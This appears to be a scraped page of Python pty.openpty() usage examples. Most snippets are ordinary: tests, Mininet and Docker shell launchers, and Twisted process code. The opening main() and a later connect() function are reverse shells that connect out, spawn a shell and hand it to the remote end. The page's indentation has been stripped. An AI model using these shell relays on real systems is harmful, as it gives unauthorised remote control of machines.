def main():
s = establish_connection()
if s is None:
return -1
print success("Connection established!")
daemonize()
master, slave = pty.openpty()
bash = subprocess.Popen(SHELL,
preexec_fn=os.setsid,
stdin=slave,
stdout=slave,
stderr=slave,
universal_newlines=True)
time.sleep(1) # Wait for bash to start before sending data to it.
os.write(master, "%s\n" % FIRST_COMMAND)
try:
while bash.poll() is None:
r, w, e = select.select([s, master], [], [])
# SSLSockets don't play nice with select because they buffer data internally.
# Code taken from https://stackoverflow.com/questions/3187565/select-and-ssl-in-python.
if s in r:
try:
data = s.recv(1024)
except ssl.SSLError as e:
if e.errno == ssl.SSL_ERROR_WANT_READ:
continue
raise
if not data: # End of file.
break
data_left = s.pending()
while data_left:
data += s.recv(data_left)
data_left = s.pending()
os.write(master, data)
elif master in r:
s.write(os.read(master, 2048))
finally:
s.close()
python类openpty()的实例源码
def test_rip_error(request, tmpdir):
"""Test failed rips error handling.
:param request: pytest fixture.
:param py.path.local tmpdir: pytest fixture.
"""
# Duplicate ISO.
iso = tmpdir.join('truncated.iso')
py.path.local(__file__).dirpath().join('sample.iso').copy(iso)
# Load the ISO.
pytest.cdload(iso)
# Execute.
output = tmpdir.ensure_dir('output')
command = ['docker', 'run', '--device=/dev/cdrom', '-v', '{}:/output'.format(output), '-e', 'DEBUG=true',
'robpol86/makemkv']
master, slave = pty.openpty()
request.addfinalizer(lambda: [os.close(master), os.close(slave)])
proc = subprocess.Popen(command, bufsize=1, cwd=HERE, stderr=subprocess.STDOUT, stdin=slave, stdout=subprocess.PIPE)
# Read output.
caught = False
while proc.poll() is None or proc.stdout.peek(1):
for line in proc.stdout:
# Watch for specific line, then truncate ISO.
if b'Analyzing seamless segments' in line:
iso.open('w').close()
elif b'ERROR: One or more titles failed.' in line:
caught = True
print(line) # Write to stdout, pytest will print if test fails.
# Verify.
assert proc.poll() > 0
assert caught is True
pytest.verify_failed_file(output)
def test_run_colored_output(self):
file = os.path.join(self.wd, 'a.yaml')
# Create a pseudo-TTY and redirect stdout to it
master, slave = pty.openpty()
sys.stdout = sys.stderr = os.fdopen(slave, 'w')
with self.assertRaises(SystemExit) as ctx:
cli.run((file, ))
sys.stdout.flush()
self.assertEqual(ctx.exception.code, 1)
# Read output from TTY
output = os.fdopen(master, 'r')
flag = fcntl.fcntl(master, fcntl.F_GETFD)
fcntl.fcntl(master, fcntl.F_SETFL, flag | os.O_NONBLOCK)
out = output.read().replace('\r\n', '\n')
sys.stdout.close()
sys.stderr.close()
output.close()
self.assertEqual(out, (
'\033[4m%s\033[0m\n'
' \033[2m2:4\033[0m \033[31merror\033[0m '
'trailing spaces \033[2m(trailing-spaces)\033[0m\n'
' \033[2m3:4\033[0m \033[31merror\033[0m '
'no new line character at the end of file '
'\033[2m(new-line-at-end-of-file)\033[0m\n'
'\n' % file))
def launch_textmode_app(self, executable, name):
dialog = TextmodeDialog(name, self.w)
self.app_executable = executable
master_fd, slave_fd = pty.openpty()
self.app_process = subprocess.Popen(str(executable), stdout=slave_fd, stderr=slave_fd)
dialog.poll(self.app_process, master_fd)
dialog.exec_()
os.close(master_fd)
os.close(slave_fd)
def __init__(self, hci_device_number=0, logger=None, events_config=None):
self._logger = logger or logging.getLogger(__name__)
self._event_parser = EventParser(config=events_config, logger=self._logger)
self._agent_events_sender = AgentEventsSender(logger=self._logger)
self._hci_device_number = hci_device_number
try:
subprocess.check_call(['hciconfig', self.hci_device_name, 'down'])
except subprocess.CalledProcessError:
self._logger.error('Could not run hciconfig down command for HCI device')
raise
self._hci_socket = create_bt_socket_hci_channel_user(hci_device_number)
self._logger.info('bind to %s complete', self.hci_device_name)
self._pty_master, pty_slave = pty.openpty()
self._pty_fd = os.fdopen(self._pty_master, 'rwb')
hci_tty = os.ttyname(pty_slave)
self._logger.debug('TTY slave for the virtual HCI: %s', hci_tty)
try:
subprocess.check_call(['hciattach', hci_tty, 'any'])
except subprocess.CalledProcessError:
self._logger.error('Could not run hciattach on PTY device')
raise
self._inputs = [self._pty_fd, self._hci_socket]
self._pty_buffer = StringIO() # Used as a seekable stream
self._gatt_logger = GattLogger(self._logger)
self._should_stop = False
def getPty(self, term, windowSize, modes):
self.environ['TERM'] = term
self.winSize = windowSize
self.modes = modes
master, slave = pty.openpty()
ttyname = os.ttyname(slave)
self.environ['SSH_TTY'] = ttyname
self.ptyTuple = (master, slave, ttyname)
def setUp(self):
# Open PTY
self.master, self.slave = pty.openpty()
def connect(host, port, disable_encryption = False):
sock = sctp_socket(family = socket.AF_INET)
sock.connect((host, port))
if disable_encryption:
std_out = sock.sock().makefile("w")
std_in = sock.sock().makefile()
shell = Popen(os.environ["SHELL"],
stdin = std_in,
stdout = std_out,
shell = True)
else:
ssl_sock = ssl.wrap_socket(sock.sock(),
ssl_version = ssl.PROTOCOL_TLSv1)
ssl_sock.send("Hi! This is the client. You're connected.\n")
r, w = os.pipe()
std_in = os.fdopen(r, "r")
std_out = os.fdopen(w, "w")
#Set our shell up to use pty, and make the output non-blocking.
master, slave = pty.openpty()
shell = Popen(os.environ["SHELL"],
stdin = PIPE,
stdout = slave,
shell = True)
shell.stdout = os.fdopen(os.dup(master), "r+")
fd = shell.stdout.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
process_connection(ssl_sock, shell.stdin, shell.stdout, disable_encryption)
sock.close()
def __start_proc(self):
# for more information, pls refer :
# http://rachid.koucha.free.fr/tech_corner/pty_pdip.html
# open new pty
master,slave = pty.openpty()
# set to raw mode
tty.setraw(master)
tty.setraw(slave)
# binding slave in to subprocess
self.proc = Popen(self.elf_path,
stdin=slave,
stdout=slave,
stderr=slave,
close_fds=True,
preexec_fn=self.preexec_fn,
env=self.env,
shell=True
)
self.pid = self.proc.pid
print('[+] Start pid : %d' % self.pid)
# binding master to own controlled file descriptors
self.proc.stdin = os.fdopen(os.dup(master),"r+")
self.proc.stdout = os.fdopen(os.dup(master),"r+")
self.proc.stderr = os.fdopen(os.dup(master),"r+")
# close unnessesary file descriptor
os.close(slave)
os.close(master)
# set non-blocking mode
fd = self.proc.stdout.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
def test_posix_printengine_tty(self):
"""Test POSIX print engine tty mode."""
sio = six.StringIO()
def __drain(masterf):
"""Drain data from masterf and discard until eof."""
while True:
chunksz = 1024
termdata = masterf.read(chunksz)
if len(termdata) < chunksz:
# assume we hit EOF
break
print(termdata, file=sio)
#
# - Allocate a pty
# - Create a thread to drain off the master side; without
# this, the slave side will block when trying to write.
# - Connect the printengine to the slave side
# - Set it running
#
(master, slave) = pty.openpty()
slavef = os.fdopen(slave, "w")
masterf = os.fdopen(master, "r")
t = threading.Thread(target=__drain, args=(masterf,))
t.start()
printengine.test_posix_printengine(slavef, True)
slavef.close()
t.join()
masterf.close()
self.assertTrue(len(sio.getvalue()) > 0)
def __t_pty_tracker(self, trackerclass, **kwargs):
def __drain(masterf):
while True:
chunksz = 1024
termdata = masterf.read(chunksz)
if len(termdata) < chunksz:
# assume we hit EOF
break
#
# - Allocate a pty
# - Create a thread to drain off the master side; without
# this, the slave side will block when trying to write.
# - Connect the prog tracker to the slave side
# - Set it running
#
(master, slave) = pty.openpty()
slavef = os.fdopen(slave, "w")
masterf = os.fdopen(master, "rb")
t = threading.Thread(target=__drain, args=(masterf,))
t.start()
p = trackerclass(output_file=slavef, **kwargs)
progress.test_progress_tracker(p, gofast=True)
slavef.close()
t.join()
masterf.close()
def startShell(self, mnopts=None):
self.stop()
args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
args.extend(['--hostname=' + self.name, '--name=' + self.name])
args.extend(['-e', 'DISPLAY'])
args.extend(['-v', '/tmp/.X11-unix:/tmp/.X11-unix:ro'])
print self.port_map
if self.port_map is not None:
for p in self.port_map:
args.extend(['-p', '%d:%d' % (p[0], p[1])])
if self.fs_map is not None:
for f in self.fs_map:
args.extend(['-v', '%s:%s' % (f[0], f[1])])
args.extend([self.docker_image])
master, slave = pty.openpty()
self.shell = subprocess.Popen(
args,
stdin=slave,
stdout=slave,
stderr=slave,
close_fds=True,
preexec_fn=os.setpgrp)
os.close(slave)
ttyobj = os.fdopen(master, 'rw')
self.stdin = ttyobj
self.stdout = ttyobj
self.pid = self.shell.pid
self.pollOut = select.poll()
self.pollOut.register(self.stdout)
self.outToNode[self.stdout.fileno()] = self
self.inToNode[self.stdin.fileno()] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
self.waiting = False
# Wait for prompt
time.sleep(1)
pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'',
self.name]
pidp = subprocess.Popen(
pid_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=False)
pidp.wait()
ps_out = pidp.stdout.readlines()
self.pid = int(ps_out[0])
self.cmd('export PS1=\"\\177\"; printf "\\177"')
self.cmd('stty -echo; set +m')
def run(command=None, args=None, output=None, image_id=None, environ=None, cwd=None):
"""Run a command and return the output. Supports string and py.path paths.
:raise CalledProcessError: Command exits non-zero.
:param iter command: Command to run.
:param iter args: List of command line arguments to insert to command.
:param str output: Path to bind mount to /output when `command` is None.
:param str image_id: Docker image to use instead of robpol86/makemkv.
:param dict environ: Environment variables to set/override in the command.
:param str cwd: Current working directory. Default is tests directory.
:return: Command stdout and stderr output.
:rtype: tuple
"""
if command is None:
command = ['docker', 'run', '--device=/dev/cdrom', '-e', 'DEBUG=true', image_id or 'robpol86/makemkv']
if output:
command = command[:-1] + ['-v', '{}:/output'.format(output)] + command[-1:]
if args:
command = command[:-1] + list(args) + command[-1:]
env = os.environ.copy()
if environ:
env.update(environ)
# Simulate stdin pty so 'docker run -it' doesn't complain.
if command[0] in ('bash', 'docker'):
master, slave = pty.openpty()
else:
master, slave = 0, 0
# Determine timeout.
if command[0] in ('docker',):
timeout = 120
else:
timeout = 30
# Run command.
try:
result = subprocess.run(
[str(i) for i in command], check=True, cwd=cwd or HERE, env=env,
stderr=subprocess.PIPE, stdin=slave or None, stdout=subprocess.PIPE,
timeout=timeout
)
finally:
if slave:
os.close(slave)
if master:
os.close(master)
return result.stdout, result.stderr
def runShell(script, env=None, cwd="/", user=None, base64_encode=False):
# check script
import pwd, grp
import pty
if not script:
return 0, ""
try:
# base64 decode
if base64_encode:
decode_script = base64.decodestring(script)
else:
decode_script = script
# check user
logger.info(decode_script)
cur_user = pwd.getpwuid(os.getuid())[0]
if not user or user == cur_user:
shell_list = ["bash", "-c", decode_script.encode('utf8')]
else:
shell_list = ["su", user, "-c", decode_script.encode('utf8'), "-s", "/bin/bash"]
master_fd, slave_fd = pty.openpty()
proc = Popen(shell_list, shell=False, universal_newlines=True, bufsize=1,
stdout=slave_fd, stderr=STDOUT, env=env, cwd=cwd, close_fds=True)
except Exception, e:
logger.error(e)
return (1, str(e))
timeout = .1
outputs = ''
while True:
try:
ready, _, _ = gs.select([master_fd], [], [], timeout)
except gs.error as ex:
if ex[0] == 4:
continue
else:
raise
if ready:
data = os.read(master_fd, 512)
outputs += data
if not data:
break
elif proc.poll() is not None:
break
os.close(slave_fd)
os.close(master_fd)
proc.wait()
status = proc.returncode
return (status, outputs)
def __init__(self, reactor, executable, args, environment, path, proto,
uid=None, gid=None, usePTY=None):
"""
Spawn an operating-system process.
This is where the hard work of disconnecting all currently open
files / forking / executing the new process happens. (This is
executed automatically when a Process is instantiated.)
This will also run the subprocess as a given user ID and group ID, if
specified. (Implementation Note: this doesn't support all the arcane
nuances of setXXuid on UNIX: it will assume that either your effective
or real UID is 0.)
"""
if pty is None and not isinstance(usePTY, (tuple, list)):
# no pty module and we didn't get a pty to use
raise NotImplementedError(
"cannot use PTYProcess on platforms without the pty module.")
abstract.FileDescriptor.__init__(self, reactor)
_BaseProcess.__init__(self, proto)
if isinstance(usePTY, (tuple, list)):
masterfd, slavefd, _ = usePTY
else:
masterfd, slavefd = pty.openpty()
try:
self._fork(path, uid, gid, executable, args, environment,
masterfd=masterfd, slavefd=slavefd)
except:
if not isinstance(usePTY, (tuple, list)):
os.close(masterfd)
os.close(slavefd)
raise
# we are now in parent process:
os.close(slavefd)
fdesc.setNonBlocking(masterfd)
self.fd = masterfd
self.startReading()
self.connected = 1
self.status = -1
try:
self.proto.makeConnection(self)
except:
log.err()
registerReapProcessHandler(self.pid, self)
def _setupChild(self, masterfd, slavefd):
"""
Set up child process after C{fork()} but before C{exec()}.
This involves:
- closing C{masterfd}, since it is not used in the subprocess
- creating a new session with C{os.setsid}
- changing the controlling terminal of the process (and the new
session) to point at C{slavefd}
- duplicating C{slavefd} to standard input, output, and error
- closing all other open file descriptors (according to
L{_listOpenFDs})
- re-setting all signal handlers to C{SIG_DFL}
@param masterfd: The master end of a PTY file descriptors opened with
C{openpty}.
@type masterfd: L{int}
@param slavefd: The slave end of a PTY opened with C{openpty}.
@type slavefd: L{int}
"""
os.close(masterfd)
os.setsid()
fcntl.ioctl(slavefd, termios.TIOCSCTTY, '')
for fd in range(3):
if fd != slavefd:
os.close(fd)
os.dup2(slavefd, 0) # stdin
os.dup2(slavefd, 1) # stdout
os.dup2(slavefd, 2) # stderr
for fd in _listOpenFDs():
if fd > 2:
try:
os.close(fd)
except:
pass
self._resetSignalDisposition()
def _execute_process_pty(cmd, cwd, env, shell, stderr_to_stdout=True):
stdout_master, stdout_slave = None, None
stderr_master, stderr_slave = None, None
fds_to_close = [stdout_master, stdout_slave, stderr_master, stderr_slave]
try:
stdout_master, stdout_slave = pty.openpty()
if stderr_to_stdout:
stderr_master, stderr_slave = stdout_master, stdout_slave
else:
stderr_master, stderr_slave = pty.openpty()
p = None
while p is None:
try:
p = Popen(
cmd,
stdin=stdout_slave, stdout=stderr_slave, stderr=STDOUT,
cwd=cwd, env=env, shell=shell, close_fds=False)
except OSError as exc:
# This can happen if a file you are trying to execute is being
# written to simultaneously on Linux
# (doesn't appear to happen on OS X)
# It seems like the best strategy is to just try again later
# Worst case is that the file eventually gets deleted, then a
# different OSError would occur.
if 'Text file busy' in '{0}'.format(exc):
# This is a transient error, try again shortly
time.sleep(0.01)
continue
raise
# This causes the below select to exit when the subprocess closes.
# On Linux, this sometimes causes Errno 5 OSError's when os.read
# is called from within _yield_data, so on Linux _yield_data
# catches and passes on that particular OSError.
os.close(stdout_slave)
if not stderr_to_stdout:
os.close(stderr_slave)
left_overs = {stdout_master: b'', stderr_master: b''}
fds = [stdout_master]
if stderr_master != stdout_master:
fds.append(stderr_master)
finally:
# Make sure we don't leak file descriptors
_close_fds(fds_to_close)
# The linesep with pty's always seems to be "\r\n", even on OS X
return _yield_data(p, fds, left_overs, "\r\n", fds_to_close)
def startShell( self, mnopts=None ):
"Start a shell process for running commands"
if self.shell:
error( "%s: shell is already running\n" % self.name )
return
# mnexec: (c)lose descriptors, (d)etach from tty,
# (p)rint pid, and run in (n)amespace
opts = '-cd' if mnopts is None else mnopts
if self.inNamespace:
opts += 'n'
# bash -i: force interactive
# -s: pass $* to shell, and make process easy to find in ps
# prompt is set to sentinel chr( 127 )
cmd = [ 'mnexec', opts, 'env', 'PS1=' + chr( 127 ),
'bash', '--norc', '-is', 'mininet:' + self.name ]
# Spawn a shell subprocess in a pseudo-tty, to disable buffering
# in the subprocess and insulate it from signals (e.g. SIGINT)
# received by the parent
master, slave = pty.openpty()
self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave,
close_fds=False )
self.stdin = os.fdopen( master, 'rw' )
self.stdout = self.stdin
self.pid = self.shell.pid
self.pollOut = select.poll()
self.pollOut.register( self.stdout )
# Maintain mapping between file descriptors and nodes
# This is useful for monitoring multiple nodes
# using select.poll()
self.outToNode[ self.stdout.fileno() ] = self
self.inToNode[ self.stdin.fileno() ] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
# Wait for prompt
while True:
data = self.read( 1024 )
if data[ -1 ] == chr( 127 ):
break
self.pollOut.poll()
self.waiting = False
# +m: disable job control notification
self.cmd( 'unset HISTFILE; stty -echo; set +m' )
def startShell( self, *args, **kwargs ):
"Start a shell process for running commands"
if self.shell:
error( "%s: shell is already running\n" % self.name )
return
# mnexec: (c)lose descriptors, (d)etach from tty,
# (p)rint pid, and run in (n)amespace
# opts = '-cd' if mnopts is None else mnopts
# if self.inNamespace:
# opts += 'n'
# bash -i: force interactive
# -s: pass $* to shell, and make process easy to find in ps
# prompt is set to sentinel chr( 127 )
cmd = [ 'docker', 'exec', '-it', '%s.%s' % ( self.dnameprefix, self.name ), 'env', 'PS1=' + chr( 127 ),
'bash', '--norc', '-is', 'mininet:' + self.name ]
# Spawn a shell subprocess in a pseudo-tty, to disable buffering
# in the subprocess and insulate it from signals (e.g. SIGINT)
# received by the parent
master, slave = pty.openpty()
self.shell = self._popen( cmd, stdin=slave, stdout=slave, stderr=slave,
close_fds=False )
self.stdin = os.fdopen( master, 'rw' )
self.stdout = self.stdin
self.pid = self._get_pid()
self.pollOut = select.poll()
self.pollOut.register( self.stdout )
# Maintain mapping between file descriptors and nodes
# This is useful for monitoring multiple nodes
# using select.poll()
self.outToNode[ self.stdout.fileno() ] = self
self.inToNode[ self.stdin.fileno() ] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
# Wait for prompt
while True:
data = self.read( 1024 )
if data[ -1 ] == chr( 127 ):
break
self.pollOut.poll()
self.waiting = False
# +m: disable job control notification
self.cmd( 'unset HISTFILE; stty -echo; set +m' )